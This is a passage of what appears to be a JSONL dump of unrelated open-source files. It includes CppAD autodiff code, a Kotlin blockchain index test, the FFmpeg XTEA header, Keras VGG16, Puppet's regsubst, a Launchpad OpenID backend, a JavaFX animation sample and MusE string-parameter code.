Eigen::Matrix HES_TYPE_D;\n typedef Eigen::Matrix HES_TYPE_ROW_MAJOR;\n\n typedef std::function FUN_TYPE_AD;\n\n typedef Derivatives DerivativesBase;\n\n\n /**\n * @brief Constructs the derivatives for autodiff without\n * codegeneration using a FUN_TYPE_AD function\n *\n * @warning If IN_DIM and/our OUT_DIM are set to dynamic (-1), then the\n * actual dimensions of x and y have to be passed here.\n *\n * @param f The function to be autodiffed\n * @param[in] inputDim inputDim input dimension, must be specified if\n * template parameter IN_DIM is -1 (dynamic)\n * @param[in] outputDim outputDim output dimension, must be specified if\n * template parameter IN_DIM is -1 (dynamic)\n */\n DerivativesCppad(FUN_TYPE_AD& f, int inputDim = IN_DIM, int outputDim = OUT_DIM)\n : DerivativesBase(), adStdFun_(f), inputDim_(inputDim), outputDim_(outputDim)\n {\n update(f, inputDim, outputDim);\n }\n\n //! copy constructor\n DerivativesCppad(const DerivativesCppad& arg)\n : DerivativesBase(arg), adStdFun_(arg.adStdFun_), inputDim_(arg.inputDim_), outputDim_(arg.outputDim_)\n {\n adCppadFun_ = arg.adCppadFun_;\n }\n\n\n //! 
update the Jacobian with a new function\n /*!\n * \\warning If IN_DIM and/our OUT_DIM are set to dynamic (-1), then the actual dimensions of\n * x and y have to be passed here.\n *\n * @param f new function to compute Jacobian of\n * @param inputDim input dimension, must be specified if template parameter IN_DIM is -1 (dynamic)\n * @param outputDim output dimension, must be specified if template parameter IN_DIM is -1 (dynamic)\n */\n void update(FUN_TYPE_AD& f, const size_t inputDim = IN_DIM, const size_t outputDim = OUT_DIM)\n {\n adStdFun_ = f;\n outputDim_ = outputDim;\n inputDim_ = inputDim;\n if (outputDim_ > 0 && inputDim_ > 0)\n recordAd();\n }\n\n //! destructor\n virtual ~DerivativesCppad() {}\n //! deep cloning of Jacobian\n DerivativesCppad* clone() const { return new DerivativesCppad(*this); }\n virtual OUT_TYPE_D forwardZero(const Eigen::VectorXd& x) { return adCppadFun_.Forward(0, x); }\n virtual JAC_TYPE_D jacobian(const Eigen::VectorXd& x)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n\n Eigen::VectorXd jac = adCppadFun_.Jacobian(x);\n\n JAC_TYPE_D out(outputDim_, x.rows());\n out = JAC_TYPE_ROW_MAJOR::Map(jac.data(), outputDim_, x.rows());\n return out;\n }\n\n virtual void sparseJacobian(const Eigen::VectorXd& x,\n Eigen::VectorXd& jac,\n Eigen::VectorXi& iRow,\n Eigen::VectorXi& jCol)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n jac = adCppadFun_.SparseJacobian(x);\n }\n\n virtual Eigen::VectorXd sparseJacobianValues(const Eigen::VectorXd& x)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n return adCppadFun_.SparseJacobian(x);\n }\n\n\n virtual HES_TYPE_D hessian(const Eigen::VectorXd& x, const Eigen::VectorXd& lambda)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n Eigen::VectorXd hessian = adCppadFun_.Hessian(x, lambda);\n HES_TYPE_D out(x.rows(), x.rows());\n out = HES_TYPE_ROW_MAJOR::Map(hessian.data(), x.rows(), x.rows());\n return out;\n }\n\n virtual void sparseHessian(const Eigen::VectorXd& x,\n const Eigen::VectorXd& lambda,\n Eigen::VectorXd& hes,\n Eigen::VectorXi& iRow,\n Eigen::VectorXi& jCol)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n hes = adCppadFun_.SparseHessian(x, lambda);\n }\n\n\n virtual Eigen::VectorXd sparseHessianValues(const Eigen::VectorXd& x, const Eigen::VectorXd& lambda)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n return adCppadFun_.SparseHessian(x, lambda);\n }\n\nprivate:\n /**\n * @brief Records the auto-diff terms\n */\n void recordAd()\n {\n // input vector, needs to be dynamic size\n Eigen::Matrix x(inputDim_);\n\n // declare x as independent\n CppAD::Independent(x);\n\n // output vector, needs to be dynamic size\n Eigen::Matrix y(outputDim_);\n\n y = adStdFun_(x);\n\n // store operation sequence in f: x -> y and stop recording\n CppAD::ADFun fAd(x, y);\n\n fAd.optimize();\n\n std::cout << \"AD FUn recorded\" << std::endl;\n\n adCppadFun_ = fAd;\n }\n\n std::function adStdFun_;\n\n int inputDim_; //! function input dimension\n int outputDim_; //! 
function output dimension\n\n CppAD::ADFun adCppadFun_;\n};\n\n#endif\n\n} /* namespace core */\n} /* namespace ct */\n"} {"text": "package io.scalechain.blockchain.storage.index\n\nimport io.kotlintest.KTestJUnitRunner\nimport io.kotlintest.matchers.Matchers\nimport io.kotlintest.specs.FlatSpec\nimport io.scalechain.blockchain.proto.*\nimport io.scalechain.blockchain.proto.test.ProtoTestData\nimport io.scalechain.blockchain.script.hash\nimport io.scalechain.blockchain.storage.TransactionLocator\nimport io.scalechain.blockchain.storage.test.TestData\nimport io.scalechain.test.ShouldSpec\nimport io.scalechain.util.ListExt\nimport org.junit.runner.RunWith\n\n/**\n * Created by kangmo on 15/12/2016.\n */\ninterface TransactionDescriptorIndexTestTrait : ShouldSpec, KeyValueCommonTrait, ProtoTestData {\n var db : KeyValueDatabase\n\n fun txDesc(height : Long, outputCount:Int) : TransactionDescriptor {\n return TransactionDescriptor(\n transactionLocator = FileRecordLocator(1, RecordLocator(2,3)),\n blockHeight = height,\n outputsSpentBy = ListExt.fill( outputCount, null)\n )\n }\n\n fun addTests() {\n \"getTransactionDescriptor\" should \"return null if the descriptor was not put\" {\n val index = object : TransactionDescriptorIndex{}\n\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe null\n }\n\n \"getTransactionDescriptor\" should \"return descriptor if the descriptor was put\" {\n val index = object : TransactionDescriptorIndex{}\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n\n index.putTransactionDescriptor( db, transaction2().hash(), txDesc(2,2))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n index.getTransactionDescriptor( db, transaction2().hash()) shouldBe txDesc(2,2)\n\n index.putTransactionDescriptor( db, transaction3().hash(), txDesc(3,3))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n index.getTransactionDescriptor( db, transaction2().hash()) shouldBe txDesc(2,2)\n index.getTransactionDescriptor( db, transaction3().hash()) shouldBe txDesc(3,3)\n }\n\n \"getTransactionDescriptor\" should \"overwrite an existing desciptor\" {\n val index = object : TransactionDescriptorIndex{}\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(2,2))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(2,2)\n }\n\n \"getTransactionDescriptor\" should \"return null if the descriptor was deleted\" {\n val index = object : TransactionDescriptorIndex{}\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.delTransactionDescriptor( db, transaction1().hash())\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe null\n\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.putTransactionDescriptor( db, transaction2().hash(), txDesc(2,2))\n index.delTransactionDescriptor( db, transaction1().hash())\n\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe null\n index.getTransactionDescriptor( db, transaction2().hash()) shouldBe txDesc(2,2)\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.putTransactionDescriptor( db, transaction2().hash(), txDesc(2,2))\n index.putTransactionDescriptor( 
db, transaction3().hash(), txDesc(3,3))\n index.delTransactionDescriptor( db, transaction2().hash())\n\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n index.getTransactionDescriptor( db, transaction2().hash()) shouldBe null\n index.getTransactionDescriptor( db, transaction3().hash()) shouldBe txDesc(3,3)\n\n index.delTransactionDescriptor( db, transaction1().hash())\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe null\n\n index.delTransactionDescriptor( db, transaction3().hash())\n index.getTransactionDescriptor( db, transaction3().hash()) shouldBe null\n }\n }\n}\n"} {"text": "/*\n * A 32-bit implementation of the XTEA algorithm\n * Copyright (c) 2012 Samuel Pitoiset\n *\n * This file is part of FFmpeg.\n *\n * FFmpeg is free software; you can redistribute it and/or\n * modify it under the terms of the GNU Lesser General Public\n * License as published by the Free Software Foundation; either\n * version 2.1 of the License, or (at your option) any later version.\n *\n * FFmpeg is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n * Lesser General Public License for more details.\n *\n * You should have received a copy of the GNU Lesser General Public\n * License along with FFmpeg; if not, write to the Free Software\n * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n */\n\n#ifndef AVUTIL_XTEA_H\n#define AVUTIL_XTEA_H\n\n#include \n\n/**\n * @file\n * @brief Public header for libavutil XTEA algorithm\n * @defgroup lavu_xtea XTEA\n * @ingroup lavu_crypto\n * @{\n */\n\ntypedef struct AVXTEA {\n uint32_t key[16];\n} AVXTEA;\n\n/**\n * Initialize an AVXTEA context.\n *\n * @param ctx an AVXTEA context\n * @param key a key of 16 bytes used for encryption/decryption\n */\nvoid av_xtea_init(struct AVXTEA *ctx, const uint8_t key[16]);\n\n/**\n * Encrypt or decrypt a buffer using a previously initialized context.\n *\n * @param ctx an AVXTEA context\n * @param dst destination array, can be equal to src\n * @param src source array, can be equal to dst\n * @param count number of 8 byte blocks\n * @param iv initialization vector for CBC mode, if NULL then ECB will be used\n * @param decrypt 0 for encryption, 1 for decryption\n */\nvoid av_xtea_crypt(struct AVXTEA *ctx, uint8_t *dst, const uint8_t *src,\n int count, uint8_t *iv, int decrypt);\n\n/**\n * @}\n */\n\n#endif /* AVUTIL_XTEA_H */\n"} {"text": "\n\n\t\n\t\n\t\n"} {"text": "# Copyright 2015 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n# pylint: disable=invalid-name\n\"\"\"VGG16 model for Keras.\n\n# Reference\n\n- [Very Deep Convolutional Networks for Large-Scale Image\nRecognition](https://arxiv.org/abs/1409.1556)\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.contrib.keras.python.keras import backend as K\nfrom tensorflow.contrib.keras.python.keras.applications.imagenet_utils import _obtain_input_shape\nfrom tensorflow.contrib.keras.python.keras.applications.imagenet_utils import decode_predictions # pylint: disable=unused-import\nfrom tensorflow.contrib.keras.python.keras.applications.imagenet_utils import preprocess_input # pylint: disable=unused-import\nfrom tensorflow.contrib.keras.python.keras.engine.topology import get_source_inputs\nfrom tensorflow.contrib.keras.python.keras.layers import Conv2D\nfrom tensorflow.contrib.keras.python.keras.layers import Dense\nfrom tensorflow.contrib.keras.python.keras.layers import Flatten\nfrom tensorflow.contrib.keras.python.keras.layers import GlobalAveragePooling2D\nfrom tensorflow.contrib.keras.python.keras.layers import GlobalMaxPooling2D\nfrom tensorflow.contrib.keras.python.keras.layers import Input\nfrom tensorflow.contrib.keras.python.keras.layers import MaxPooling2D\nfrom tensorflow.contrib.keras.python.keras.models import Model\nfrom tensorflow.contrib.keras.python.keras.utils import layer_utils\nfrom tensorflow.contrib.keras.python.keras.utils.data_utils import get_file\n\n\nWEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'\nWEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'\n\n\ndef VGG16(include_top=True,\n weights='imagenet',\n input_tensor=None,\n input_shape=None,\n pooling=None,\n classes=1000):\n \"\"\"Instantiates the VGG16 architecture.\n\n Optionally loads weights pre-trained\n on ImageNet. Note that when using TensorFlow,\n for best performance you should set\n `image_data_format=\"channels_last\"` in your Keras config\n at ~/.keras/keras.json.\n\n The model and the weights are compatible with both\n TensorFlow and Theano. The data format\n convention used by the model is the one\n specified in your Keras config file.\n\n Arguments:\n include_top: whether to include the 3 fully-connected\n layers at the top of the network.\n weights: one of `None` (random initialization)\n or \"imagenet\" (pre-training on ImageNet).\n input_tensor: optional Keras tensor (i.e. 
output of `layers.Input()`)\n to use as image input for the model.\n input_shape: optional shape tuple, only to be specified\n if `include_top` is False (otherwise the input shape\n has to be `(224, 224, 3)` (with `channels_last` data format)\n or `(3, 224, 224)` (with `channels_first` data format).\n It should have exactly 3 inputs channels,\n and width and height should be no smaller than 48.\n E.g. `(200, 200, 3)` would be one valid value.\n pooling: Optional pooling mode for feature extraction\n when `include_top` is `False`.\n - `None` means that the output of the model will be\n the 4D tensor output of the\n last convolutional layer.\n - `avg` means that global average pooling\n will be applied to the output of the\n last convolutional layer, and thus\n the output of the model will be a 2D tensor.\n - `max` means that global max pooling will\n be applied.\n classes: optional number of classes to classify images\n into, only to be specified if `include_top` is True, and\n if no `weights` argument is specified.\n\n Returns:\n A Keras model instance.\n\n Raises:\n ValueError: in case of invalid argument for `weights`,\n or invalid input shape.\n \"\"\"\n if weights not in {'imagenet', None}:\n raise ValueError('The `weights` argument should be either '\n '`None` (random initialization) or `imagenet` '\n '(pre-training on ImageNet).')\n\n if weights == 'imagenet' and include_top and classes != 1000:\n raise ValueError('If using `weights` as imagenet with `include_top`'\n ' as true, `classes` should be 1000')\n # Determine proper input shape\n input_shape = _obtain_input_shape(\n input_shape,\n default_size=224,\n min_size=48,\n data_format=K.image_data_format(),\n include_top=include_top)\n\n if input_tensor is None:\n img_input = Input(shape=input_shape)\n else:\n img_input = Input(tensor=input_tensor, shape=input_shape)\n\n # Block 1\n x = Conv2D(\n 64, (3, 3), activation='relu', padding='same',\n name='block1_conv1')(img_input)\n x = Conv2D(\n 64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)\n\n # Block 2\n x = Conv2D(\n 128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x)\n x = Conv2D(\n 128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)\n\n # Block 3\n x = Conv2D(\n 256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x)\n x = Conv2D(\n 256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x)\n x = Conv2D(\n 256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)\n\n # Block 4\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x)\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x)\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)\n\n # Block 5\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x)\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x)\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)\n\n if include_top:\n # Classification block\n x = Flatten(name='flatten')(x)\n x = Dense(4096, activation='relu', name='fc1')(x)\n x = 
Dense(4096, activation='relu', name='fc2')(x)\n x = Dense(classes, activation='softmax', name='predictions')(x)\n else:\n if pooling == 'avg':\n x = GlobalAveragePooling2D()(x)\n elif pooling == 'max':\n x = GlobalMaxPooling2D()(x)\n\n # Ensure that the model takes into account\n # any potential predecessors of `input_tensor`.\n if input_tensor is not None:\n inputs = get_source_inputs(input_tensor)\n else:\n inputs = img_input\n # Create model.\n model = Model(inputs, x, name='vgg16')\n\n # load weights\n if weights == 'imagenet':\n if include_top:\n weights_path = get_file(\n 'vgg16_weights_tf_dim_ordering_tf_kernels.h5',\n WEIGHTS_PATH,\n cache_subdir='models')\n else:\n weights_path = get_file(\n 'vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',\n WEIGHTS_PATH_NO_TOP,\n cache_subdir='models')\n model.load_weights(weights_path)\n if K.backend() == 'theano':\n layer_utils.convert_all_kernels_in_model(model)\n\n if K.image_data_format() == 'channels_first':\n if include_top:\n maxpool = model.get_layer(name='block5_pool')\n shape = maxpool.output_shape[1:]\n dense = model.get_layer(name='fc1')\n layer_utils.convert_dense_weights_data_format(dense, shape,\n 'channels_first')\n return model\n"} {"text": "# Perform regexp replacement on a string or array of strings.\n#\n# @param target [String, Array[String]]\n# The string or array of strings to operate on. If an array, the replacement will be\n# performed on each of the elements in the array, and the return value will be an array.\n# @param pattern [String, Regexp, Type[Regexp]]\n# The regular expression matching the target string. If you want it anchored at the start\n# and or end of the string, you must do that with ^ and $ yourself.\n# @param replacement [String, Hash[String, String]]\n# Replacement string. Can contain backreferences to what was matched using \\\\0 (whole match),\n# \\\\1 (first set of parentheses), and so on.\n# If the second argument is a Hash, and the matched text is one of its keys, the corresponding value is the replacement string.\n# @param flags [Optional[Pattern[/^[GEIM]*$/]], Pattern[/^G?$/]]\n# Optional. String of single letter flags for how the regexp is interpreted (E, I, and M cannot be used\n# if pattern is a precompiled regexp):\n# - *E* Extended regexps\n# - *I* Ignore case in regexps\n# - *M* Multiline regexps\n# - *G* Global replacement; all occurrences of the regexp in each target string will be replaced. Without this, only the first occurrence will be replaced.\n# @param encoding [Enum['N','E','S','U']]\n# Optional. How to handle multibyte characters when compiling the regexp (must not be used when pattern is a\n# precompiled regexp). A single-character string with the following values:\n# - *N* None\n# - *E* EUC\n# - *S* SJIS\n# - *U* UTF-8\n# @return [Array[String], String] The result of the substitution. 
Result type is the same as for the target parameter.\n#\n# @example Get the third octet from the node's IP address:\n# $i3 = regsubst($ipaddress,'^(\\\\d+)\\\\.(\\\\d+)\\\\.(\\\\d+)\\\\.(\\\\d+)$','\\\\3')\n#\n# @example Put angle brackets around each octet in the node's IP address:\n# $x = regsubst($ipaddress, /([0-9]+)/, '<\\\\1>', 'G')\n#\nPuppet::Functions.create_function(:regsubst) do\n dispatch :regsubst_string do\n param 'Variant[Array[String],String]', :target\n param 'String', :pattern\n param 'Variant[String,Hash[String,String]]', :replacement\n optional_param 'Optional[Pattern[/^[GEIM]*$/]]', :flags\n optional_param \"Enum['N','E','S','U']\", :encoding\n end\n\n dispatch :regsubst_regexp do\n param 'Variant[Array[String],String]', :target\n param 'Variant[Regexp,Type[Regexp]]', :pattern\n param 'Variant[String,Hash[String,String]]', :replacement\n optional_param 'Pattern[/^G?$/]', :flags\n end\n\n def regsubst_string(target, pattern, replacement, flags = nil, encoding = nil)\n re_flags = 0\n operation = :sub\n if !flags.nil?\n flags.split(//).each do |f|\n case f\n when 'G' then operation = :gsub\n when 'E' then re_flags |= Regexp::EXTENDED\n when 'I' then re_flags |= Regexp::IGNORECASE\n when 'M' then re_flags |= Regexp::MULTILINE\n end\n end\n end\n inner_regsubst(target, Regexp.compile(pattern, re_flags, encoding), replacement, operation)\n end\n\n def regsubst_regexp(target, pattern, replacement, flags = nil)\n pattern = (pattern.pattern || '') if pattern.is_a?(Puppet::Pops::Types::PRegexpType)\n inner_regsubst(target, pattern, replacement, operation = flags == 'G' ? :gsub : :sub)\n end\n\n def inner_regsubst(target, re, replacement, op)\n target.respond_to?(op) ? target.send(op, re, replacement) : target.collect { |e| e.send(op, re, replacement) }\n end\n private :inner_regsubst\nend\n"} {"text": "\"\"\"\nLaunchpad OpenId backend\n\"\"\"\n\nfrom .open_id import OpenIdAuth\n\n\nclass LaunchpadOpenId(OpenIdAuth):\n name = 'launchpad'\n URL = 'https://login.launchpad.net'\n USERNAME_KEY = 'nickname'\n"} {"text": "\n\n## Part 5: Defining Type Systems\n\nIn this part of the tutorial we will show that defining type systems for\nlanguages is essentially no different from defining semantics. The major\ndifference is that programs and fragments of programs now rewrite to their\ntypes, instead of to concrete values. In terms of K, we will learn how\nto use it for a certain particular but important kind of applications.\n"} {"text": "/*\n * Copyright (c) 2008, 2016, Oracle and/or its affiliates.\n * All rights reserved. 
Use is subject to license terms.\n *\n * This file is available and licensed under the following license:\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * - Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * - Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in\n * the documentation and/or other materials provided with the distribution.\n * - Neither the name of Oracle Corporation nor the names of its\n * contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\npackage ensemble.samples.animation.interpolator;\n\nimport javafx.animation.Interpolator;\nimport javafx.animation.KeyFrame;\nimport javafx.animation.KeyValue;\nimport javafx.animation.Timeline;\nimport javafx.application.Application;\nimport javafx.scene.Parent;\nimport javafx.scene.Scene;\nimport javafx.scene.effect.Lighting;\nimport javafx.scene.layout.Pane;\nimport javafx.scene.paint.Color;\nimport javafx.scene.shape.Circle;\nimport javafx.stage.Stage;\nimport javafx.util.Duration;\n\n/**\n * A sample that shows various types of interpolation between key frames in a\n * timeline. There are five circles, each animated with a different\n * interpolation method. The Linear interpolator is the default. 
Use the\n * controls to reduce opacity to zero for some circles to compare with others,\n * or change circle color to distinguish between individual interpolators.\n *\n * @sampleName Interpolator\n * @preview preview.png\n * @docUrl http://docs.oracle.com/javase/8/javafx/visual-effects-tutorial/animations.htm#JFXTE149 JavaFX Transitions & Animation\n * @playground - (name=\"LINEAR\")\n * @playground circle1.opacity (min=0, max=1)\n * @playground circle1.fill\n * @playground - (name=\"EASE_BOTH\")\n * @playground circle2.opacity (min=0, max=1)\n * @playground circle2.fill\n * @playground - (name=\"EASE_IN\")\n * @playground circle3.opacity (min=0, max=1)\n * @playground circle3.fill\n * @playground - (name=\"EASE_OUT\")\n * @playground circle4.opacity (min=0, max=1)\n * @playground circle4.fill\n * @playground - (name=\"SPLINE\")\n * @playground circle5.opacity (min=0, max=1)\n * @playground circle5.fill\n * @see javafx.animation.Interpolator\n * @see javafx.animation.KeyFrame\n * @see javafx.animation.KeyValue\n * @see javafx.animation.Timeline\n * @see javafx.util.Duration\n * @embedded\n *\n * @related /Graphics 2d/Bouncing Balls\n * @related /Graphics 2d/Display Shelf\n * @related /Scenegraph/Events/Key Stroke Motion\n * @related /Graphics 3d/Xylophone\n */\npublic class InterpolatorApp extends Application {\n\n private final Timeline timeline = new Timeline();\n private Circle circle1;\n private Circle circle2;\n private Circle circle3;\n private Circle circle4;\n private Circle circle5;\n\n public Parent createContent() {\n Pane root = new Pane();\n root.setPrefSize(245, 230);\n root.setMinSize(Pane.USE_PREF_SIZE, Pane.USE_PREF_SIZE);\n root.setMaxSize(Pane.USE_PREF_SIZE, Pane.USE_PREF_SIZE);\n\n // create circles by method createMovingCircle listed below\n // default interpolator\n circle1 = createMovingCircle(Interpolator.LINEAR,\n 1, 0.7, Color.RED);\n // circle slows down when reached both ends of trajectory\n circle2 = createMovingCircle(Interpolator.EASE_BOTH,\n 2, 0.45, Color.VIOLET);\n // circle slows down in the beginning of animation\n circle3 = createMovingCircle(Interpolator.EASE_IN,\n 3, 0.2, Color.BLUE);\n // circle slows down in the end of animation\n circle4 = createMovingCircle(Interpolator.EASE_OUT,\n 4, 0.35, Color.YELLOW);\n // one can define own behaviour of interpolator by spline method\n circle5 = createMovingCircle(Interpolator.SPLINE(0.5, 0.1, 0.1, 0.5),\n 5, 0.7, Color.GREEN);\n\n root.getChildren().addAll(circle1, circle2, circle3, circle4, circle5);\n return root;\n }\n\n private Circle createMovingCircle(Interpolator interpolator, int which,\n double opacity, Color color) {\n // create a transparent circle\n Circle circle = new Circle(45, 45, 40, color);\n // set initial opacity\n circle.setOpacity(opacity);\n circle.setCenterY((which * 35) + 5);\n // add effect\n circle.setEffect(new Lighting());\n // create a timeline for moving the circle\n timeline.setCycleCount(Timeline.INDEFINITE);\n timeline.setAutoReverse(true);\n // create a keyValue for horizontal translation of circle to\n // the position 155px with given interpolator\n KeyValue keyValue = new KeyValue(circle.translateXProperty(), 155,\n interpolator);\n // create a keyFrame with duration 4s\n KeyFrame keyFrame = new KeyFrame(Duration.seconds(4), keyValue);\n // add the keyframe to the timeline\n timeline.getKeyFrames().add(keyFrame);\n return circle;\n }\n\n public void play() {\n timeline.play();\n }\n\n @Override\n public void stop() {\n timeline.stop();\n }\n\n @Override\n public void 
start(Stage primaryStage) throws Exception {\n primaryStage.setResizable(false);\n primaryStage.setScene(new Scene(createContent()));\n primaryStage.show();\n play();\n }\n\n /**\n * Java main for when running without JavaFX launcher\n * @param args command line arguments\n */\n public static void main(String[] args) {\n launch(args);\n }\n}\n"} {"text": "//=============================================================================\n// MusE\n// Linux Music Editor\n// $Id: stringparam.cpp,v 1.0.0.0 2010/04/24 01:01:01 terminator356 Exp $\n//\n// Copyright (C) 1999-2011 by Werner Schweer and others\n// String parameter module added by Tim.\n//\n// This program is free software; you can redistribute it and/or modify\n// it under the terms of the GNU General Public License\n// as published by the Free Software Foundation; version 2 of\n// the License, or (at your option) any later version.\n//\n// This program is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License\n// along with this program; if not, write to the Free Software\n// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n//=============================================================================\n\n#include \"stringparam.h\" \n#include \"xml.h\" \n\nnamespace MusECore {\n \n//---------------------------------------------------------\n// findKey\n//---------------------------------------------------------\n\niStringParamMap StringParamMap::findKey(const char* key)\n{\n iStringParamMap icm = find(std::string(key));\n return icm;\n}\n\n//---------------------------------------------------------\n// set\n//---------------------------------------------------------\n\nvoid StringParamMap::set(const char* key, const char* value)\n{\n iStringParamMap icm = find(std::string(key));\n if(icm == end())\n insert(std::pair(key, value));\n else\n icm->second = std::string(value); \n}\n\n//---------------------------------------------------------\n// remove\n//---------------------------------------------------------\n\nvoid StringParamMap::remove(const char* key)\n{\n erase(std::string(key));\n}\n\n//---------------------------------------------------------\n// read\n//---------------------------------------------------------\n\nvoid StringParamMap::read(Xml& xml, const QString& name)\n{\n QString n;\n QString value;\n \n for (;;) \n {\n Xml::Token token = xml.parse();\n const QString tag = xml.s1();\n switch (token) \n {\n case Xml::Error:\n case Xml::End:\n return;\n case Xml::TagStart:\n xml.unknown(name.toLatin1().constData());\n break;\n case Xml::Attribut:\n if(tag == \"name\") \n n = xml.s2();\n else\n if(tag == \"val\") \n value = xml.s2(); \n else\n xml.unknown(name.toLatin1().constData());\n break;\n case Xml::TagEnd:\n if(tag == name) \n {\n // Add or modify the item.\n set(n.toLatin1(), value.toLatin1());\n return;\n }\n default:\n break;\n }\n }\n}\n\n//---------------------------------------------------------\n// write\n//---------------------------------------------------------\n\nvoid StringParamMap::write(int level, Xml& xml, const char* name) const\n{\n if(empty())\n return;\n \n for(ciStringParamMap r = begin(); r != end(); ++r) \n xml.tag(level, \"%s name=\\\"%s\\\" val=\\\"%s\\\"/\", name, r->first.c_str(), r->second.c_str());\n}\n\n} // namespace 
